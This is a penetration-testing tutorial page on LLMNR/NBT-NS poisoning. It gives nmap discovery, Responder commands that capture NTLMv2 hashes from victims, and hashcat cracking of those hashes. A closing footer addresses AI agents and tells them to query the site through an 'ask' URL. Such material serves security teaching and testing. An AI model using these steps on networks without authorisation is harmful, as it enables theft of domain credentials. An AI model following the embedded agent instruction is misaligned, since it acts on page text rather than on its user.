# Port 5355 - LLMNR Link-Local Multicast Name Resolution (LLMNR) and the previous iteration of the service called NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. | Port | Service | | :--: | ------- | | 5355 | LLMNR | | 137 | NBT-NS | Abusing LLMNR via a [AiTM/MITM](https://darkcybe.gitbook.io/darkcybe/offensive-security-operations/penetration-testing/techniques/capec/94-adversary-in-the-middle-aitm) attack can grant access to credentials in the form of a username and NTLMv2 hash, however this attack will require access to the same subnet as the client and server being intercepted. The below diagram depicts how this attack works: 1. A domain connected host attempts to connect to `//servername`, forwarding the request to the Domain Controller (DC) in this instance that is running DNS and DHCP services. 2. The `//servername` does not exist in the DNS records, therefore the DC returns the failed request. 3. The host then broadcasts a request to all devices on the localnet looking for `//servername`. 4. The attacker responds identifying itself as `//servername`. 5. The host sends its plaintext username and NTLMv2 hashed password to the attacker. 6. The attacker can then crack the hash received by the host to gain valid domain credentials.
LLMNR Man-in-the-Middle
## Reconnaissance/Discovery As mentioned in the overview, this attack requires access to the domain as the attacking machine must be within the domain ip range in order to intercept the LLMNR request. External reconnaissance will not yield any useful results for this attack. An Internal discovery scan can be run against a Domain Controller to identify whether the LLMNR service is running by identification of the exposed port. {% code overflow="wrap" %} ```bash sudo nmap -A -sC -p 5355, 137 10.10.10.10 ``` {% endcode %} ### Exploitation #### Using [Responder](https://darkcybe.github.io/posts/Responder/) to Perform LLMNR Poisoning {% code overflow="wrap" %} ```bash # Responder listener on attacker machine, interface ens33 is on same domain as target # Running the listener will wait for a host to make a request python Responder.py -I ens33 -wd ``` {% endcode %} Once a victim makes a request, the NTLMv2 Username and Hash will be captured as per the below output where the victim client `172.16.2.31` made a request for `SERVERNAM`, exposing the Administrator NTLMv2 credentials.
LLMNR - Responder.py
Once NTLMv2 credentials hashes have been collected and saved to a text file. They can be parsed through a credential cracking utility such as hashcat. {% code overflow="wrap" %} ```bash hashcat -m 5600 -a 0 /PATH/TO/DUMP.txt /usr/share/wordlists/rockyou.txt ``` {% endcode %}
LLMNR - Hashcat Password Cracking
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://darkcybe.gitbook.io/darkcybe/offensive-security-operations/penetration-testing/techniques/technology-focused/network-protocols-and-services/port-5355-llmnr.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.